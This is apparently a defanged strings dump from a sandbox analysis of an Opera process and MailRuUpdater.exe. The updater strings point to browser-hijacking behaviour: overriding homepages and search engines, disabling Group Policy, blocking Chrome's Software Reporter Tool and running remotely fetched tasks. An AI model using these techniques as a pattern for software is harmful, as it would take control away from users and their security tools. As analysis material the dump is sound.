Opera
34.0.2036.41
Opera Software
Opera Internet Browser

opera.exe_3828:




.text
`.rdata
@.data
.rsrc
@.reloc
u.QQQQQj
j.Yf;
_tcPVj@
.PjRW
OperaDllMain
.thunks
.syzygy
0123456789
kernel32.dll
c:\buildbot\slave\workdir\repos\lar6\desktop-2013-1\chromium\src\sandbox\win\src\sandbox_policy_base.cc
CreateNamedPipeW
NtCreateKey
NtOpenKey
NtOpenKeyEx
GetProcessWindowStation
function not supported
operation canceled
address_family_not_supported
operation_in_progress
operation_not_supported
protocol_not_supported
operation_would_block
address family not supported
broken pipe
inappropriate io control operation
not supported
operation in progress
operation not permitted
operation not supported
operation would block
protocol not supported
operator
c:\buildbot\slave\workdir\repos\LAR6\desktop-2013-1\chromium\src\out\Release\opera.exe.pdb
opera.exe
WINMM.dll
RegCloseKey
RegCreateKeyExW
RegOpenKeyExW
ADVAPI32.dll
CloseWindowStation
CreateWindowStationW
SetProcessWindowStation
USER32.dll
GetProcessHeap
CreateIoCompletionPort
GetProcessHandleCount
KERNEL32.dll
GetCPInfo
zcÁ
22W.OOjjjjjjjjjjjjjUH>11111Y`i,i^^^^i
.TTTTT]
!!!}|!#\<<\#!|}!!!
pON.lnm}
"company_name": "Opera Software",
"default_profile_path_template": "Opera Software/Opera {InternalStream}",
"domain": ".opera.com",
"expected_signer": "Opera Software ASA",
"file_name_base": "opera",
"partner_image_download_url_parameter": "",
"product_name": "Opera",
"sitecheck_host": "sitecheck2.opera.com",
"urls": {
"autoupdate": "hXXps://autoupdate.geo.opera.com/",
"crash": "hXXps://crash.opera.com",
"download": "hXXp://VVV.opera.com/download/",
"download_full_windows": "hXXp://VVV.opera.com/download/get/?partner=www&opsys=Windows",
"firstrun": "hXXp://redir.opera.com/VVV.opera.com/firstrun/",
"flash_ppapi_update_site": "hXXps://redir.opera.com/plugins/?application/x-shockwave-flash&type=ppapi",
"flash_update_site": "hXXps://redir.opera.com/plugins/?application/x-shockwave-flash",
"geolocation": "hXXp://autoupdate.geo.opera.com/geolocation/",
"geolocation_privacy": "hXXp://help.opera.com/geolocation/privacy/",
"google_favicon": "hXXp://redir.opera.com/favicons/google/favicon.ico",
"help": "hXXp://help.opera.com/?p=",
"homepage": "hXXp://VVV.opera.com/",
"partner_redirect": "hXXp://redir.opera.com/speeddials/partner/",
"report_issue": "hXXps://bugs.opera.com/wizard/",
"survey": "hXXps://redir.opera.com/surveys",
"uninstall_survey": "hXXp://redir.opera.com/uninstallsurvey/",
"upgrade": "hXXp://redir.opera.com/VVV.opera.com/upgrade/"
"visible_product_name": "Opera",
"webui_scheme": "opera",
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><dependency><dependentAssembly><assemblyIdentity type="Win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="*" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"></supportedOS><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"></supportedOS><supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"></supportedOS><supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"></supportedOS><supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"></supportedOS></application></compatibility></assembly>
> >$>(>,>0>4>~>
6"9&9*9.92969:9>9
_opautolib.pyd
Ndebug.log
ntdll.dll
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_PERFORMANCE_TEXT
HKEY_PERFORMANCE_NLSTEXT
HKEY_CURRENT_CONFIG
HKEY_DYN_DATA
pipe\
Akernel32.dll
kernelbase.dll
c\Sessions\%d\AppContainerNamedObjects\%ls
ALPC Port
eKey
Bkernel32.dll
gdi32.dll
user32.dll
xntdll.dll
wow_helper.exe"
Cmscoree.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
USER32.DLL
portuguese-brazilian
%Program Files%\Opera\34.0.2036.41\opera.exe
Copyright Opera Software 2015
Opera
34.0.2036.41
Opera Software
Opera Internet Browser

opera.exe_3828_rwx_09E0A000_000F5000:




4$h%CR
Ph%3S
!Wh%CS
Ph%cS
PhU%U

opera.exe_3828_rwx_0DA0A000_00037000:




PhU%u

opera.exe_3828_rwx_17B0A000_000F5000:




XVWSSShH\

MailRuUpdater.exe_3536:




.text
`.rdata
@.data
.rsrc
@.reloc
SHA256 block transform for x86, CRYPTOGAMS by <appro@openssl.org>
SHA1 block transform for x86, CRYPTOGAMS by <appro@openssl.org>
.EKSWU
DlSHA512 block transform for x86, CRYPTOGAMS by <appro@openssl.org>
Montgomery Multiplication for x86, CRYPTOGAMS by <appro@openssl.org>
FtPS
FTPG
FTPj
6-9'6-9'
$6.:$6.:
*?#1*?#1
>8$4,8$4,
AES for x86, CRYPTOGAMS by <appro@openssl.org>
|$@3|$<3
Camellia for x86 by <appro@openssl.org>
RC4 for x86, CRYPTOGAMS by <appro@openssl.org>
<0|1<:}-
<0|9<:}5
w%s( 
8%u(j
uXj.hLj
ugj.hLj
gj.hdi
 FTPj
F\ FTP
<x%uY
><%uB
t.Jx 
;*u%C
Lj.hL
j.Yf;
_tcPVj@
.PjRW
f;F.se
?sqliu
 2 34 567
?%Y-%u
m-%du
?%H:%u
M:%Su
C:\desktop_apps\SputnikLib/log_ng.h
C:\desktop_apps\CommonFiles/url_params_common.hpp
mailru::url_params::formalize_common_params
mailru::url_params::AddWinVerInfo
mailru::url_params::AddChromeMetrics
mailru::url_params::AddToolVer
mailru::url_params::AddOtherProcessInfo
..\CommonFiles\audit\audit.cpp
..\CommonFiles\audit\audit_browsers_manager.cpp
c:\desktop_apps\commonfiles\audit\audit_browsers_manager.h
ReportTime
..\CommonFiles\audit\audit_browser_settings.cpp
mailru::AuditBrowserSettings::MakeReport
) report successfully done
Make report failed
mailru::AuditBrowserSettings::ScheduleReportCheck
mailru::AuditBrowserSettings::CollectReportInfo
mailru::AuditBrowserSettings::CheckReport
error report structer
..\CommonFiles\audit\audit_google_chrome.cpp
mailru::AuditGoogleChrome::CheckerHomepageCh::RestoreChild
mailru::AuditGoogleChrome::CheckerDefaultSearchCh::RestoreChild
mailru::AuditGoogleChrome::CheckerVbmCh::RestoreChild
:Incorrect key length
Unable to read chrome blocklist
Chrome blocklist file is not valid
chrome blocklist contains unsupported elements
..\CommonFiles\chrome-safe-browsing.cpp
mailru::chromium::ChromeSafeBrowsing::ReadSafeBrowsingFile
shard_header.add_prefix_count > kMaxAddSubChunksCount
Unable to open "%s" for writing
RegCreateKeyTransactedW
C:\desktop_apps\SputnikLib/reg_key.hpp
startup_urls
urls_to_restore_on_startup
..\commonfiles\chromiums.cpp
Chrome
RegOpenKeyTransactedW
RegDeleteKeyTransactedW
KERNEL32.DLL
boost::too_few_args: format-string referred to more arguments than were passed
boost::too_many_args: format-string referred to less arguments than were passed
%%%%-%%%%-%%%%-%%%%
C:\desktop_apps\CommonFiles/sql_lite_bind.hpp
..\CommonFiles\chromium_settings.cpp
hXXp://mail.ru
hXXp://VVV.mail.ru
browser.show_home_button
session.restore_on_startup
yandex\.ru. clid
mailru::chromium::settings::search_url
chrome_settings_overrides
search_url
template_url_data
mailru::chromium::settings::search_url_without_extensions
@MAIL.RU
suggestions_url
suggestions_url_post_params
windows-1251
keyword
mail.ru
D15371FE-C188-4E99-9841-A91F3BCBCCC3
search_terms_replacement_key
search_url_post_params
favicon_url
hXXp://go.mail.ru/favicon.ico
image_url
image_url_post_params
instant_url
instant_url_post_params
originating_url
alternate_urls
default_search_provider_data.template_url_data
suggest_url
default_search_provider.name
default_search_provider.search_url
go.mail.ru
keystore_encryption_bootstrap_token
chrome_url_overrides
chrome-extension://
extensions.settings.
hXXp://mail.ru/cnt/9824
mail.ru
mailru::chromium::settings::url_from_ext_id
extensions.known_disabled
error %s
update_url
.enabled
hXXp://xml.binupdate.mail.ru/amigo/check_policy.amg?
check_policy.amg not loaded
check_policy.amg NOT decoded
check_policy.amg NOT parsed
mailru::chromium::settings::InstallExtensionFromUrlNoThrow
Disabling dse in GPO failed: %s
Looking for local GPO failed: %s
yasearch.native_comps.hXXp://bar-widgets.yandex.ru/packages/approved/176/manifest.xml#smartbox.all.settings.searchName
hXXp://VVV.mail.ru/cnt/7861
hXXp://agent.mail.ru/ru/download/agent_windows/download.html?sputnik=1
hXXp://img.imgsmail.ru/r/agent/favicon.ico
hXXp://mail.ru/cnt/10445
hXXp://VVV.mail.ru/
hXXp://go.mail.ru/search?fr=ntg&q={SearchTerms}
hXXp://go.mail.ru/search?fr=ntg&q=
hXXp://m.mail.ru/cgi-bin/splash?opera=1
hXXp://VVV.mail.ru/cnt/5090
hXXp://go.mail.ru/search?q=%s&fr=ntg
@mail.ru
hXXp://suggests.go.mail.ru/ff3?q={SearchTerm}
hXXp://go.mail.ru/search_images?utf8in=1&q=%s&fr=oprtb
hXXp://go.mail.ru/favicon_images.ico
hXXp://go.mail.ru/search_video?utf8in=1&q=%s&fr=oprtb
hXXp://go.mail.ru/favicon_video.ico
hXXp://VVV.mail.ru/cnt/5091
hXXp://redir.opera.com/speeddials/mail.ru
hXXp://redir.opera.com/bookmarks/mail.ru
hXXp://go.mail.ru/search?q=%s&fr=opr11
hXXp://go.mail.ru/search?q={SearchTerms}&fr=ntg
hXXp://suggests.go.mail.ru/ff3?q={searchTerms}
hXXp://mail.ru/cnt/10226
hXXp://go.mail.ru/?pin=1
mailru::default_browser::find_executable
..\CommonFiles\default_browser.cpp
C:\desktop_apps\SputnikLib/com_scope.h
SHORTCUTS PROSEED ERROR: std exception = %s
..\commonfiles\file_util.cpp
C:\desktop_apps\3party\ticpp/ticpp.h
..\CommonFiles\firefox_settings.cpp
mailru::firefox::settings::~settings
browser.startup.homepage
Profile%d
hXXp://go.mail.ru
browser.search.selectedEngine
browser.search.defaultenginename
browser.search.defaulturl
keyword.URL
extensions.enabledAddons
mailru::firefox::settings::is_yandex_elements_intsalled
yasearch@yandex.ru
mailru::firefox::settings::remove_media_viewer
browser.search.suggest.enabled
browser.search.useDBForOrder
Firefox
..\CommonFiles\Firefox_visual_bookmarks.cpp
mailru::firefox::visual_bookmarks::install
mailru::firefox::visual_bookmarks::download
urn:mozilla:item:
mailru::firefox::visual_bookmarks::localstore_rdf
chrome://browser/content/browser.xul#mailru_main_toolbar
(\s*app-profile\s \{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7\}\s rel%\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7\}\s \d )\s*.*
partner_new_url
partner_online_url
hXXps://xtnmailru.cdnmail.ru/go_ffvbm1_update.rdf
chrome://vbmail.ru/skin/vb-logo.png
extensions.autoDisableScopes
extensions.shownSelectionUI
mailru::firefox::enable_visual_bookmarks::PatchExtensionSqlite
mailru::firefox::enable_visual_bookmarks::PatchExtensionIni
mailru::firefox::enable_visual_bookmarks::PatchExtensionJson
updateURL
updateKey
optionsURL
aboutURL
iconURL
icon64URL
Mail.Ru
homepageURL
hXXp://sputnik.mail.ru/
{ec8030f7-c20a-464f-9b0e-13a3a9e97384}
mailru::firefox::enable_visual_bookmarks::is_enabled
mailru::firefox::enable_visual_bookmarks::PatchFileTime
..\CommonFiles\GPOManager.cpp
GetRegistryKey for machine failed
GetRegistryKey for user failed
?mailru::sqlite_bind::column_int64
search_id() = %s
HKEY_USERS ie search url = %s
HKEY_LOCAL_MACHINE ie search url = %s
..\CommonFiles\ie_settings.cpp
Disabling GPO restrictions failed: %s
mailru::reg_keyT<0>::check
ntdll.dll
kernel32.dll
..\CommonFiles\Install_stat.cpp
..\CommonFiles\savestate.cpp
web_data_ver
save_google_state_task::do_task error : item_in_storage.file_serialize
..\CommonFiles\shortcut_check.cpp
c:\desktop_apps\commonfiles\tasks\TaskShortcuts.h
..\CommonFiles\Tasks\RemoteTaskExecuter.cpp
mailru::RemoteTasksExecuter::InitTasks
mailru::RemoteTasksExecuter::ExecuteTask
mailru::RemoteTasksExecuter::FetchTasks
Fetching tasks.mrdj...
Fetching url =
google chrome sync_enabled
..\CommonFiles\Tasks\TaskEmulateWebStoreInstallation.cpp
ERROR google_blocked_mailru_extensions_base::ProceedExtensions std::exception %s !!!
..\CommonFiles\Tasks\TaskGoogleBlockedMailruSettings.cpp
ChromeVbmId
ChromeVbmArchive
..\CommonFiles\Tasks\TaskInstallUpdater.cpp
..\CommonFiles\Tasks\TaskInterface.cpp
..\CommonFiles\Tasks\TaskInstallUpdaterAsService.cpp
cmd_line =
..\CommonFiles\Tasks\TaskPeriodicDisableGPO.cpp
14000000000000000
..\CommonFiles\Tasks\TaskPreventSRT.cpp
mailru::TaskPreventSRT::SendReporterMetric
software_reporter
ReporterLogPattern
invalid map<K, T> key
ERROR: chrome_value is empty
..\CommonFiles\Tasks\TaskRemovePornExtensions.cpp
..\CommonFiles\Tasks\TaskRestoreFFDse.cpp
..\CommonFiles\Tasks\TaskStartGroupBlackList.cpp
mailru::TaskStartGroupBlackList::ProceedGoogleChrome
ProceedGoogleChrome patch prepared
ProceedGoogleChrome start patching
google_chrome object constructed
Google Chrome settings are synced
Google Chrome extensions are synced
TaskStartGroupBlackList::ProceedGoogleChrome failed, error =
ProceedGoogleChrome patch_util.set_was_patch(true);
mailru::TaskStartGroupBlackList::CleanUpChromeStartPages
mailru::TaskStartGroupBlackList::ProceedFirefox
ProceedFirefox is running
hXXp://go.mail.ru/?ffverfix=1&fr=ffverfix_sg
TaskStartGroupBlackList::ProceedGoogleChrome failed, er =
TaskStartGroupBlackList::ProceedGoogleChrome failed
hXXp://go.mail.ru/?ieverfix=1&fr=ieverfix_sg
..\CommonFiles\tasks\task_amigo_remove_pinned_tabs.cpp
..\CommonFiles\Tasks\task_change_sic_settings.cpp
..\CommonFiles\tasks\task_user_preferences.cpp
mailru::TaskUserPreferences::AnalyzeFirefox
hXXp://bar-widgets.yandex.ru/packages/approved/176/manifest.xml
hXXp://bar-widgets.yandex.ru/packages/approved/176/manifest.xml#smartbox
Error reading yandex plugin config: %s
Error changing yandex smartbar config: %s
Error disabling yandex smartbox plugin: %s
..\CommonFiles\yandex_elements.cpp
class Json::Value *__thiscall mailru::YandexElements::FindSettingInStateConfig(class Json::Value &,const class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > &,const class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > &) const
Error reading yandex config setting "%s": %s
browser.uiCustomization.state
Error enabling standard search panel: %s
guid_manager.cpp
installer.cpp
mailru::reg_keyT<0>::throw_on_error
main.cpp
Started with cmd line
c:\desktop_apps\mailruupdater\concrete_update_task.hpp
self_update_task.cpp
SendBrowsersStatistic.cpp
c:\desktop_apps\mailruupdater\SendBrowsersStatistic.h
updater::SendBrowsersStastic::BrowserData<class mailru::chromium::settings_amigo>::getDSEurl
updater::SendBrowsersStastic::BrowserData<class mailru::chromium::settings_mail>::getDSEurl
updater::SendBrowsersStastic::BrowserData<class mailru::chromium::settings_google>::getDSEurl
service.cpp
asio.misc
asio.misc error
C:\desktop_apps\3party\boost_1_56_0\boost/exception/detail/exception_ptr.hpp
update_info.cpp
fetch_url
Program fetch url
md5 fetch url
cmd_line
util.cpp
updater::Util::SaveChromeStateTask
SHA-256 part of OpenSSL 1.0.0g 18 Jan 2012
len>=0 && len<=(int)sizeof(ctx->key)
j <= (int)sizeof(ctx->key)
SHA1 part of OpenSSL 1.0.0g 18 Jan 2012
SHA-512 part of OpenSSL 1.0.0g 18 Jan 2012
ssl_sess_cert
ssl_cert
evp_pkey
x509_pkey
%s(%d): OpenSSL internal error, assertion failed: %s
RSA part of OpenSSL 1.0.0g 18 Jan 2012
supportedAlgorithms
crossCertificatePair
certificateRevocationList
cACertificate
userCertificate
userPassword
supportedApplicationContext
Microsoft Local Key set
LocalKeySet
id-Gost28147-89-None-KeyMeshing
id-Gost28147-89-CryptoPro-KeyMeshing
password based MAC
id-PasswordBasedMAC
X509v3 Certificate Issuer
certificateIssuer
certicom-arc
Proxy Certificate Information
proxyCertInfo
Microsoft Smartcardlogin
msSmartcardLogin
joint-iso-itu-t
JOINT-ISO-ITU-T
set-rootKeyThumb
setAttr-Cert
setCext-cCertRequired
setCext-certType
setct-CertResTBE
setct-CertReqTBEX
setct-CertReqTBE
setct-AcqCardCodeMsgTBE
setct-CertInqReqTBS
setct-CertResData
setct-CertReqTBS
setct-CertReqData
setct-PCertResTBS
setct-PCertReqData
setct-AcqCardCodeMsg
certificate extensions
set-certExt
set-msgExt
id-ecPublicKey
id-cmc-confirmCertAcceptance
id-cmc-getCert
id-regInfo-certReq
id-regCtrl-protocolEncrKey
id-regCtrl-oldCertID
id-it-revPassphrase
id-it-keyPairParamRep
id-it-keyPairParamReq
id-it-unsupportedOIDs
id-it-caKeyUpdateInfo
id-it-encKeyPairTypes
id-it-signKeyPairTypes
id-it-caProtEncCert
id-mod-attribute-cert
id-mod-qualified-cert-93
id-mod-qualified-cert-88
id-smime-aa-ets-certCRLTimestamp
id-smime-aa-ets-certValues
id-smime-aa-ets-CertificateRefs
id-smime-aa-ets-otherSigCert
id-smime-aa-smimeEncryptCerts
id-smime-aa-signingCertificate
id-smime-aa-encrypKeyPref
id-smime-aa-msgSigDigest
id-smime-ct-publishCert
id-smime-mod-msg-v3
sdsiCertificate
x509Certificate
localKeyID
certBag
pkcs8ShroudedKeyBag
keyBag
pbeWithSHA1And2-KeyTripleDES-CBC
pbeWithSHA1And3-KeyTripleDES-CBC
TLS Web Client Authentication
TLS Web Server Authentication
X509v3 Extended Key Usage
extendedKeyUsage
X509v3 Authority Key Identifier
authorityKeyIdentifier
X509v3 Certificate Policies
certificatePolicies
X509v3 Private Key Usage Period
privateKeyUsagePeriod
X509v3 Key Usage
keyUsage
X509v3 Subject Key Identifier
subjectKeyIdentifier
Netscape Certificate Sequence
nsCertSequence
Netscape CA Policy Url
nsCaPolicyUrl
Netscape Renewal Url
nsRenewalUrl
Netscape CA Revocation Url
nsCaRevocationUrl
Netscape Revocation Url
nsRevocationUrl
Netscape Base Url
nsBaseUrl
Netscape Cert Type
nsCertType
Netscape Certificate Extension
nsCertExt
extendedCertificateAttributes
challengePassword
dhKeyAgreement
passed a null parameter
DSO support routines
x509 certificate routines
error:lX:%s:%s:%s
Stack part of OpenSSL 1.0.0g 18 Jan 2012
Big Number part of OpenSSL 1.0.0g 18 Jan 2012
lhash part of OpenSSL 1.0.0g 18 Jan 2012
ASN.1 part of OpenSSL 1.0.0g 18 Jan 2012
hexkey
rsa_keygen_pubexp
rsa_keygen_bits
RAND part of OpenSSL 1.0.0g 18 Jan 2012
You need to read the OpenSSL FAQ, hXXp://VVV.openssl.org/support/faq.html
keylen <= sizeof key
EVP_CIPHER_key_length(cipher) <= (int)sizeof(md_tmp)
%d.%d.%d.%d
EC part of OpenSSL 1.0.0g 18 Jan 2012
ECDSA part of OpenSSL 1.0.0g 18 Jan 2012
.\crypto\ec\ec_key.c
DSA part of OpenSSL 1.0.0g 18 Jan 2012
Diffie-Hellman part of OpenSSL 1.0.0g 18 Jan 2012
.\crypto\dh\dh_key.c
value.single
value.set
USER32.DLL
NETAPI32.DLL
ADVAPI32.DLL
keylength
keyfunc
EVP part of OpenSSL 1.0.0g 18 Jan 2012
.\crypto\pkcs12\p12_key.c
d.registeredID
d.iPAddress
d.uniformResourceIdentifier
d.ediPartyName
d.directoryName
d.dNSName
d.rfc822Name
d.otherName
ECDH part of OpenSSL 1.0.0g 18 Jan 2012
priv_key
pub_key
%'%1$=%C%K%O%s%
.%.-.3.7.9.?.W.[.o.y.
C%C'C3C7C9COCWCiC
%s: (%d bit)
Public-Key
Private-Key
recommended-private-length: %d bits
public-key:
private-key:
PKCS#3 DH Public-Key
PKCS#3 DH Private-Key
Public-Key: (%d bit)
Private-Key: (%d bit)
<unsupported>
IP Address:%d.%d.%d.%d
URI:%s
DNS:%s
email:%s
EdiPartyName:<unsupported>
X400Name:<unsupported>
othername:<unsupported>
/usr/local/ssl/certs
/usr/local/ssl/cert.pem
SSL_CERT_DIR
SSL_CERT_FILE
CONF part of OpenSSL 1.0.0g 18 Jan 2012
X509_PUBKEY
public_key
.\crypto\asn1\x_pubkey.c
name.relativename
name.fullname
certificateHold
Certificate Hold
cessationOfOperation
Cessation Of Operation
keyCompromise
Key Compromise
%*s%s:
%*sOnly Attribute Certificates
%*sOnly CA Certificates
%*sOnly User Certificates
%d.%d.%d.%d/%d.%d.%d.%d
%*sPolicy Text: %s
%*scrlUrl:
EXTENDED_KEY_USAGE
%*sZone: %s, User:
keyid
.\crypto\x509v3\v3_akey.c
d.usernotice
d.cpsuri
d.other
CERTIFICATEPOLICIES
%*sExplicit Text: %s
%*sNumber%s:
%*sOrganization: %s
%*sCPS: %s
PKEY_USAGE_PERIOD
keyCertSign
Certificate Sign
keyAgreement
Key Agreement
keyEncipherment
Key Encipherment
.\crypto\x509v3\v3_skey.c
pubkey
EC_PRIVATEKEY
publicKey
privateKey
value.implicitlyCA
value.parameters
value.named_curve
p.char_two
p.prime
p.ppBasis
p.tpBasis
p.onBasis
p.other
PKCS8_PRIV_KEY_INFO
pkey
pkeyalg
x%s
Basis Type: %s
Field Type: %s
ASN1 OID: %s
%s %s%lu (%s0x%lx)
value.bag
value.safes
value.shkeybag
value.keybag
value.sdsicert
value.x509cert
value.other
cert_info
\X
'() ,-./:=?
CONF_def part of OpenSSL 1.0.0g 18 Jan 2012
[[%s]]
[%s] %s=%s
MD5 part of OpenSSL 1.0.0g 18 Jan 2012
PROXY_CERT_INFO_EXTENSION
crlUrl
certStatus
certId
OCSP_CERTSTATUS
value.unknown
value.revoked
value.good
value.byKey
value.byName
reqCert
OCSP_CERTID
issuerKeyHash
certs
%s - d:d:d%.*s %d%s
AUTHORITY_KEYID
enc_key
key_enc_algor
cert
d.encrypted
d.digest
d.signed_and_enveloped
d.enveloped
d.sign
d.data
.\crypto\evp\evp_pkey.c
d.receiptList
d.allOrFirstTier
d.compressedData
d.authenticatedData
d.encryptedData
d.digestedData
d.envelopedData
d.signedData
d.ori
d.pwri
d.kekri
d.kari
d.ktri
CMS_PasswordRecipientInfo
keyDerivationAlgorithm
keyIdentifier
CMS_KeyAgreeRecipientInfo
recipientEncryptedKeys
CMS_OriginatorIdentifierOrKey
d.originatorKey
CMS_OriginatorPublicKey
CMS_RecipientEncryptedKey
CMS_KeyAgreeRecipientIdentifier
d.rKeyId
CMS_RecipientKeyIdentifier
CMS_OtherKeyAttribute
keyAttr
keyAttrId
CMS_KeyTransRecipientInfo
encryptedKey
keyEncryptionAlgorithm
certificates
d.crl
d.subjectKeyIdentifier
d.issuerAndSerialNumber
CMS_CertificateChoices
d.v2AttrCert
d.v1AttrCert
d.extendedCertificate
d.certificate
CMS_OtherCertificateFormat
otherCert
otherCertFormat
X.509 part of OpenSSL 1.0.0g 18 Jan 2012
OPENSSL_ALLOW_PROXY_CERTS
X509_CERT_PAIR
X509_CERT_AUX
%s.dll
%lu:%s:%s:%d:%s
ddddddZ
ddddddZ
PEM part of OpenSSL 1.0.0g 18 Jan 2012
phrase is too short, needs to be at least %d chars
Enter PEM pass phrase:
TRUSTED CERTIFICATE
CERTIFICATE REQUEST
NEW CERTIFICATE REQUEST
CERTIFICATE
X509 CERTIFICATE
PRIVATE KEY
ENCRYPTED PRIVATE KEY
ANY PRIVATE KEY
.\crypto\evp\evp_key.c
nkey <= EVP_MAX_KEY_LENGTH
?456789:;<=
!"#$%&'()* ,-./0123
Verifying - %s
D:\Libs\opencv\sources\modules\core\include\opencv2/core/mat.inl.hpp
D:\Libs\opencv\sources\modules\imgproc\src\templmatch.cpp
img.dims <= 2 && templ.dims <= 2 && corr.dims <= 2
corrsize.height <= img.rows   templ.rows - 1 && corrsize.width <= img.cols   templ.cols - 1
(depth == CV_8U || depth == CV_32F) && type == _templ.type() && _img.dims() <= 2
_img.size().height <= _templ.size().height && _img.size().width <= _templ.size().width
D:\Libs\opencv\sources\modules\imgproc\src\sumpixels.cpp
D:\Libs\opencv\sources\modules\core\src\alloc.cpp
D:\Libs\opencv\sources\modules\core\src\matrix.cpp
m.dims >= 2
0 <= _rowRange.start && _rowRange.start <= _rowRange.end && _rowRange.end <= m.rows
0 <= _colRange.start && _colRange.start <= _colRange.end && _colRange.end <= m.cols
m.dims <= 2
0 <= roi.x && 0 <= roi.width && roi.x   roi.width <= m.cols && 0 <= roi.y && 0 <= roi.height && roi.y   roi.height <= m.rows
r == Range::all() || (0 <= r.start && r.start < r.end && r.end <= m.size[i])
COI is not supported by the function
0 <= i && i < (int)vv.size()
0 <= i && i < (int)v.size()
Unknown/unsupported array type
i < (int)vv.size()
(size_t)i < vv.size()
!fixedSize() || ((Mat*)obj)->size.operator()() == _sz
!fixedSize() || ((UMat*)obj)->size.operator()() == _sz
!fixedSize() || ((Mat*)obj)->size.operator()() == Size(_cols, _rows)
!fixedSize() || ((UMat*)obj)->size.operator()() == Size(_cols, _rows)
CV_MAT_TYPE(mtype) == m.type()
m.dims == d
m.size[j] == sizes[j]
d == 2 && ((sizes[0] == sz.height && sizes[1] == sz.width) || (allowTransposed && sizes[0] == sz.width && sizes[1] == sz.height))
!fixedSize() || len == vv.size()
Vectors with element size %d are not supported. Please, modify OutputArray::create()
v[j].empty()
i < (int)v.size()
checkScalar(value, type(), arr.kind(), _InputArray::CUDA_GPU_MAT)
_m.dims() <= 2
_src.dims() <= 2 && esz <= 32
src.size() == dst.size() && (src.cols == 1 || src.rows == 1)
dst.cols == dst.rows
m.dims <= 2 && m.rows == m.cols
_src.dims() <= 2
A.size == arrays[i0]->size
A.step[d-1] == A.elemSize()
%s:%d: error: (%d) %s in function %s
%s:%d: error: (%d) %s
OpenCV Error: %s (%s) in %s, file %s, line %d
Inplace operation is not supported
Input image depth is not supported by function
Unsupported format or combination of formats
Input COI is not supported
No CUDA support
No OpenGL support
Unknown %s code %d
D:\Libs\opencv\sources\modules\core\src\system.cpp
tlsKey != TLS_OUT_OF_INDEXES
cv::TLSContainerStorage::releaseKey
key_ >= 0
D:\Libs\opencv\sources\modules\core\src\convert.cpp
j < nsrcs && src[j].depth() == depth
i1 >= 0 && j < ndsts && dst[j].depth() == depth
D:\Libs\opencv\sources\modules\core\src\copy.cpp
mask.depth() == CV_8U && (mcn == 1 || mcn == cn)
size() == mask.size()
checkScalar(value, type(), _value.kind(), _InputArray::MAT )
mask.empty() || (mask.type() == CV_8U && size == mask.size)
Unknown/unsupported border type
src.depth() == dst.depth() && src.size == dst.size
(coi1 != 0 || src.channels() == 1) && (coi2 != 0 || dst.channels() == 1)
src.channels() == dst.channels()
D:\Libs\opencv\sources\modules\core\src\matop.cpp
CV_MAT_CN(_type) == e.a.channels()
Unknown operation
D:\Libs\opencv\sources\modules\core\src\arithm.cpp
The operation is neither 'array op array' (where arrays have the same size and type), nor 'array op scalar', nor 'scalar op array'
(mtype == CV_8U || mtype == CV_8S) && _mask.sameSize(*psrc1)
The operation is neither 'array op array' (where arrays have the same size and the same number of channels), nor 'array op scalar', nor 'scalar op array'
type2 == CV_64F && (sz2.height == 1 || sz2.height == 4)
(mtype == CV_8UC1 || mtype == CV_8SC1) && _mask.sameSize(*psrc1)
The operation is neither 'array op array' (where arrays have the same size and the same type), nor 'array op scalar', nor 'scalar op array'
D:\Libs\opencv\sources\modules\core\src\stat.cpp
mask.empty() || mask.type() == CV_8U
mask.empty() || mask.type() == CV_8UC1
dst.type() == CV_64F && dst.isContinuous() && (dst.cols == 1 || dst.rows == 1) && dcn >= cn
D:\Libs\opencv\sources\modules\core\src\mathfuncs.cpp
!)>D:\Libs\opencv\sources\modules\core\src\dxt.cpp
type == srcB.type() && srcA.size() == srcB.size()
D:\Libs\opencv\sources\modules\core\src\umatrix.cpp
D:\Libs\opencv\sources\modules\core\src\array.cpp
_dst.data == data0
NULL array pointer is passed
Unrecognized or unsupported array type
unrecognized or unsupported array type
Only continuous nD arrays are supported here
Unsupported format
rect.width >= 0 && rect.height >= 0 && rect.x < image->width && rect.y < image->height && rect.x   rect.width >= (int)(rect.width > 0) && rect.y   rect.height >= (int)(rect.height > 0)
D:\Libs\opencv\sources\modules\core\src\datastructs.cpp
D:\Libs\opencv\sources\modules\core\include\opencv2/core/private.cuda.hpp
The library is compiled without CUDA support
D:\Libs\opencv\sources\modules\core\src\opengl.cpp
The library is compiled without OpenGL support
OpenCL.dll
D:\Libs\opencv\sources\modules\core\src\matmul.cpp
type == B.type() && (type == CV_32FC1 || type == CV_64FC1 || type == CV_32FC2 || type == CV_64FC2)
a_size.width == len
a_size.height == len
C.type() == type && (((flags&GEMM_3_T) == 0 && C.rows == d_size.height && C.cols == d_size.width) || ((flags&GEMM_3_T) != 0 && C.rows == d_size.width && C.cols == d_size.height))
type == _src2.type()
src1.size == src2.size
src.channels() == 1
delta.channels() == 1 && (delta.rows == src.rows || delta.rows == 1) && (delta.cols == src.cols || delta.cols == 1)
D:\Libs\opencv\sources\modules\core\src\lapack.cpp
type == _src2.type() && (type == CV_32F || type == CV_64F)
(method != DECOMP_LU && method != DECOMP_CHOLESKY) || is_normal || src.rows == src.cols
src.rows == src.cols
w.type() == u.type() && u.type() == vt.type() && u.data && vt.data && w.data
